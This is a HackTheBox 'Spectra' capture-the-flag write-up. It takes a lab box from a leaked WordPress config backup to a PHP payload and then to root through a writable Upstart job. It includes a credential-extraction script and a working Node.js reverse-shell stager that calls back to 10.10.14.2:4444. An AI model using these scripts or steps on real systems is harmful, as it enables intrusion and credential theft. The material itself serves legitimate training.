2021-03-07 01:18:41 +05:00

HackTheBox-Spectra

NMAP

PORT     STATE SERVICE          VERSION                                   
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4                                   
|_http-server-header: nginx/1.17.4                 
|_http-title: Site doesn't have a title (text/html).                 
3306/tcp open  mysql            MySQL (unauthorized)
8081/tcp open  blackice-icecap?                                              
| fingerprint-strings:                                               
|   FourOhFourRequest:                            
|     HTTP/1.1 200 OK                                                     
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:15 GMT
|     Connection: close                               
|     Hello World                               
|   GetRequest:                      
|     HTTP/1.1 200 OK                
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:14 GMT                                 
|     Connection: close              
|     Hello World                    
|   HTTPOptions:                     
|     HTTP/1.1 200 OK                
|     Content-Type: text/plain                                            
|     Date: Thu, 04 Mar 2021 16:38:25 GMT                                 
|     Connection: close              
|_    Hello World        

PORT 80 (HTTP)

Clicking on Test or Software Issue Tracker leads to http://spectra.htb, so add that name to /etc/hosts first.

Browsing to wp-config.php.save (a leftover backup of the WordPress config, which the server hands out as plain text instead of executing) reveals the database credentials.

But connecting to MySQL on 3306 with them is refused: nmap already reported the service as "unauthorized", meaning our host is not allowed to connect at all.
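A small helper for this step, added here and not part of the original writeup: it pulls the DB_* defines out of a saved copy of wp-config.php so the leaked values can be tried elsewhere (the database password is worth trying against the WordPress login when MySQL itself refuses us). The sample config below is constructed; the user, database and password in it are placeholders, not the values from the box.

```sh
#!/bin/sh
# Added example: extract database credentials from a leaked WordPress config.
# Typical use: curl -s http://spectra.htb/<path>/wp-config.php.save > wp-config.save
#              wp_config_creds wp-config.save

# Print NAME=VALUE for every define('DB_...', '...') line in FILE.
# Handles both quote styles and the spacing WordPress's own template uses.
wp_config_creds() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]\(DB_[A-Z_]*\)['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1=\2/p" "$1"
}

# Convenience wrapper: return only the password, for feeding into a login attempt.
wp_config_password() {
    wp_config_creds "$1" | sed -n 's/^DB_PASSWORD=//p'
}

# Constructed sample config (placeholders, not the real box's values).
make_sample_config() {
    cat > "$1" <<'EOF'
<?php
/** Database settings (constructed sample for the example) */
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'examplepass' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
$table_prefix = 'wp_';
EOF
}
```

Any password this prints is a reuse candidate: try it on /wp-login.php for the usernames wpscan enumerates before spending time on the database port that already rejected us.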

Wpscan

Since MySQL is off the table and the site is WordPress, run wpscan against it.

wpscan enumerates a WordPress user named administrator.

Using the password devteam01 we logged in with administrator

As administrator we can edit the 404.php template of the active theme through the theme editor.

Replacing its contents with a Metasploit PHP payload and then requesting a page that does not exist (which makes WordPress render 404.php) gives us a shell as the nginx user.

Add our SSH public key to /home/nginx/.ssh/authorized_keys to get a stable SSH session as nginx.

Looking around the /opt directory

we find a passwd file with a plaintext password in it.

That password lets us SSH in as katie.

Running sudo -l shows what katie is allowed to run as root.

She can run initctl, the Upstart control tool used to start, stop and restart services; the job definitions it acts on live in /etc/init.

Among those job files are some that katie can edit.

This job runs a Node.js script, nodetest.js.

That script is what serves the Hello World we saw on port 8081. Because Upstart runs the job as root and we can write to the script, we can replace its contents with a Node.js reverse shell.

After editing, start a netcat listener, then restart the job with sudo initctl; the connection comes back as root.
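The privilege-escalation step above, written out as an added example (not the original writeup's commands): it enumerates Upstart jobs whose definition we can modify and what they execute, then stages a Node.js reverse shell in the script one of them runs. The listener address 10.10.14.2:4444, the job name and the location of nodetest.js are assumptions; take the real path from the exec line the enumeration prints.

```sh
#!/bin/sh
# Added example: Upstart job enumeration and Node.js reverse-shell staging.
# Run on the target as the user that has "sudo initctl" (katie in the writeup).

# Print the command an Upstart job runs: its first "exec" line, or the body of
# its "script ... end script" block when it has no exec line.
job_command() {
    awk '
        /^[ \t]*exec[ \t]/ { sub(/^[ \t]*exec[ \t]+/, ""); print; exit }
        /^[ \t]*script[ \t]*$/ { inscript = 1; next }
        /^[ \t]*end script/ { inscript = 0 }
        inscript { print }
    ' "$1"
}

# List jobs in DIR (default /etc/init) whose .conf file is writable by us,
# with what they run. A job here that runs as root (Upstart's default when the
# job has no "setuid") and can be restarted via sudo initctl is a root shell.
writable_jobs() {
    dir=${1:-/etc/init}
    for f in "$dir"/*.conf; do
        [ -f "$f" ] && [ -w "$f" ] || continue
        printf '%s: %s\n' "$(basename "$f" .conf)" "$(job_command "$f")"
    done
}

# Overwrite FILE (the Node script a job executes) with a reverse shell that
# connects to HOST:PORT and pipes an interactive /bin/sh over the socket.
write_node_revshell() {
    file=$1; host=$2; port=$3
cat > "$file" <<EOF
// reverse shell staged into the job's script (assumed LHOST/LPORT)
const net = require('net');
const { spawn } = require('child_process');
const sock = net.connect($port, '$host', () => {
    const sh = spawn('/bin/sh', ['-i']);
    sock.pipe(sh.stdin);
    sh.stdout.pipe(sock);
    sh.stderr.pipe(sock);
});
EOF
}

# Usage on the target (hypothetical names; the script path comes from writable_jobs):
#   writable_jobs
#   write_node_revshell /path/printed/by/writable_jobs/nodetest.js 10.10.14.2 4444
#   sudo initctl restart <jobname>
# and beforehand on the attacking host:
#   nc -lvnp 4444
```

Restart rather than start the job: it is already running (it is what answers on 8081), and Upstart only re-reads the script when the process is respawned. If the job also has a "respawn" stanza, the shell comes back on its own should the listener drop.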